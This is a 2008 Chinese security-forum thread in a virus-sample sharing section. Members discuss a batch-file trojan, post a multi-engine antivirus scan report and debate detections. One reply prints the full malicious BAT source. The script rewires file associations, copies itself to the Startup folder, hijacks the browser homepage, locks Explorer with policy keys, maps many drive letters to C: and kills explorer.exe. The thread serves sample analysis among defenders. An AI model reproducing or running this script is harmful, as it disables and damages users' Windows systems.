收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 转个很牛的BAT
12下一页
返回列表 发新帖
查看: 3854|回复: 18
收起左侧

[病毒样本] 转个很牛的BAT

[复制链接]
fish
发表于 2008-2-26 12:33:22 | 显示全部楼层 |阅读模式
http://bbs.janmeng.com/thread-697420-1-1.html  剑盟的连接~
http://bbs.hypost.cn/read.php?tid-218692.html  绅博的连接~
有影子或虚拟机的玩玩
VirSCAN.org Scanned Report :
Scanned time   : 2008/02/26 12:29:37 (CST)
Scanner results: 25%的杀软(9/36)报告发现病毒
File Name      : 绅博GDATA_AntiVirenKit(中国)官方论坛_dudu.rar
File Size      : 71618 byte
File Type      : RAR archive data, v1d, os
MD5            : 2ef6d5aa68e549a3598ca3885c573cd0
SHA1           : 0e90b3e0da2e80b33c6e5fa1dedeaa3c16cbf800
Online report  : http://virscan.org/report/2687db1445357a19c4de4cd5eecabf4c.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      3.0.0.126       2008.02.25        2008-02-25  3.63   Trojan.BAT.Agent.bw
安博士V3       2008.02.26.00   2008.02.26        2008-02-26  1.42   -
AntiVir        7.6.0.67        7.0.2.189         2008-02-25  6.89   -
Arcavir        1.0.4           200802252138      2008-02-25  1.57   Trojan.Agent.Aik
AVAST          1.0.8           080225-0          2008-02-25  3.07   -
AVG            7.5.51.442      269.21.1/1298     2008-02-25  2.88   -
BitDefender    7.60825.983663  7.17730           2008-02-26  7.79   -
CA (VET)       9.0.0.143       31.3.5563         2008-02-25  8.20   -
ClamAV         0.92            5996              2008-02-26  0.04   -
Comodo         2.11            2.0.0.446         2008-02-25  1.93   -
CP Secure      1.1.0.695       2008.02.26        2008-02-26  10.77  -
Dr.WEB         4.44.0.9170     2008.02.25        2008-02-25  9.20   BAT.Xiao
ewido          4.0.0.2         2008.02.25        2008-02-25  2.44   -
F-PROT         4.4.1.52        20080225          2008-02-25  1.64   -
F-SECURE       5.51.6100       2008.02.25.06     2008-02-25  0.03   Trojan:W32/Agent.EDX [Orion]
飞塔           2.81-3.11       8.790             2008-02-26  1.95   -
ViRobot        20080225        2008.02.25        2008-02-25  0.42   -
IKARUS         T3.1.01.20      2008.02.26.70368  2008-02-26  1.58   Trojan.BAT.Agent.bw
江民杀毒       10.00.650       2008.02.24        2008-02-24  1.48   -
卡巴斯基       5.5.10          2008.02.26        2008-02-26  13.94  Trojan.BAT.Agent.bw
金山毒霸       2007.6.20.249   2008.2.25         2008-02-25  0.84   -
迈克菲         5.2.00          5237              2008-02-25  2.21   -
Microsoft      1.3204          2008.02.26        2008-02-26  6.83   -
MKS_VIR        2.01            2008.02.25        2008-02-25  5.73   Trojan.BAT.Shutdown.t
NORMAN         5.91.10         5.90              2008-02-21  12.62  -
熊猫卫士       9.04.03.0001    2008.02.25        2008-02-25  2.99   -
趋势           8.500-1001      5.122.10          2008-02-25  0.05   -
Prevx          V2              20080226          2008-02-26  8.91   -
QuickHeal      9.00            2008.02.25        2008-02-25  2.29   -
瑞星           20.0            20.32.42.00       2008-02-22  1.77   -
SOPHOS         2.70.1          4.26              2008-02-26  5.18   -
赛门铁克       1.3.0.24        20080225.003      2008-02-25  0.87   -
nProtect       2008-02-26.00   1181993           2008-02-26  5.88   Trojan/W32.Shutdowner.149270
The Hacker     6.2.9           v00229            2008-02-25  1.52   -
VBA32          3.12.6.2        20080225.2129     2008-02-25  1.97   Trojan.BAT.Agent.bw
VirusBuster    4.3.19:9        9.121.23/11.0     2008-02-25  2.80   -
一个乱改文件关联~变出N个分区的BAT

[ 本帖最后由 fish 于 2008-2-26 12:34 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

冷冷
发表于 2008-2-26 12:34:29 | 显示全部楼层
沙发

小C发过了

[ 本帖最后由 冷_冷 于 2008-2-26 22:30 编辑 ]
回复

举报

zhouyuan
发表于 2008-2-26 12:38:43 | 显示全部楼层
把它丢给红伞去
回复

举报

dikex
发表于 2008-2-26 12:39:39 | 显示全部楼层
比较无聊的一个东西
  1. @echo off
  2. assoc .txt=exefile
  3. assoc .exe=txtfile
  4. assoc .htm=exefile
  5. assoc .html=exefile
  6. assoc .com=txtfile
  7. assoc .gho=txtfile
  8. assoc .rar=txtfile
  9. assoc .zip=txtfile
  10. assoc .chm=txtfile
  11. assoc .jpg=txtfile
  12. assoc .doc=exefile
  13. assoc .ppt=txtfile
  14. assoc .vbs=txtfile
  15. assoc .cmd=txtfile
  16. assoc .bmp=txtfile
  17. assoc .gif=txtfile
  18. assoc .ico=txtfile
  19. assoc .png=txtfile
  20. assoc .jpeg=txtfile
  21. assoc .jpe=txtfile
  22. assoc .jfif=txtfile
  23. assoc .fla=txtfile
  24. assoc .swf=txtfile
  25. assoc .avi=txtfile
  26. assoc .mov=txtfile
  27. assoc .asf=txtfile
  28. assoc .wmv=txtfile
  29. assoc .rm=txtfile
  30. assoc .ra=txtfile
  31. assoc .mvb=txtfile
  32. assoc .flv=txtfile
  33. assoc .mpg=txtfile
  34. assoc .wav=txtfile
  35. assoc .mpeg=txtfile
  36. assoc .mp3=txtfile
  37. assoc .mp4=txtfile
  38. assoc .3gp=txtfile
  39. assoc .3g2=txtfile
  40. assoc .dat=txtfile
  41. assoc .msi=txtfile
  42. assoc .bat=txtfile
  43. copy %0 "%windir%\system32"
  44. copy %0 "%systemdrive%"
  45. copy %0 "%userprofile%\「开始」菜单\程序\启动\*.*"
  46. reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.xiaowo.net /f
  47. reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.xiaowo.net /f
  48. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
  49. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  50. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  51. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  52. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  53. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
  54. subst b: C:\
  55. subst h: C:\
  56. subst i: C:\
  57. subst j: C:\
  58. subst k: C:\
  59. subst l: C:\
  60. subst m: C:\
  61. subst n: C:\
  62. subst o: C:\
  63. subst p: C:\
  64. subst q: C:\
  65. subst r: C:\
  66. subst s: C:\
  67. subst t: C:\
  68. subst u: C:\
  69. subst v: C:\
  70. subst w: C:\
  71. subst x: C:\
  72. subst y: C:\
  73. subst z: C:\
  74. taskkill /im explorer.exe /f
  75. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  76. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
  77. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
  78. title 你还真运行了...            制作人: 恶作剧病毒,请不要乱尝试
复制代码
回复

举报

zhouyuan
发表于 2008-2-26 12:41:36 | 显示全部楼层
The file 'dudu.EXE' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection is removed from our virus definition file (VDF) with the version: 7.0.1.138.

[ 本帖最后由 zhouyuan 于 2008-2-26 12:55 编辑 ]
回复

举报

su-tt
发表于 2008-2-26 12:52:38 | 显示全部楼层
dudu.EXE;C:\Documents and Settings\Administrator\桌面;BAT.Xiao;;
回复

举报

28654621
头像被屏蔽
发表于 2008-2-26 13:16:21 | 显示全部楼层
D:\download\绅博GDATA_AntiVirenKit(中国)官方论坛_dudu.rar>>dudu.EXE        Trojan.Cap811423.yzau.arc        木马        还未处理
回复

举报

xuhl196
发表于 2008-2-26 13:18:20 | 显示全部楼层

看不出来有多牛啊!

回复

举报

hahacomcn
发表于 2008-2-26 13:59:53 | 显示全部楼层
红伞没报,,发过去看看。
回复

举报

sam.to
发表于 2008-2-26 14:01:53 | 显示全部楼层
原帖由 zhouyuan 于 2008-2-26 12:41 发表
The file 'dudu.EXE' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection is removed from our virus definition file (VDF) wi ...

FALSE POSITIVE??上报卡巴
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-4 20:12 , Processed in 0.129528 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表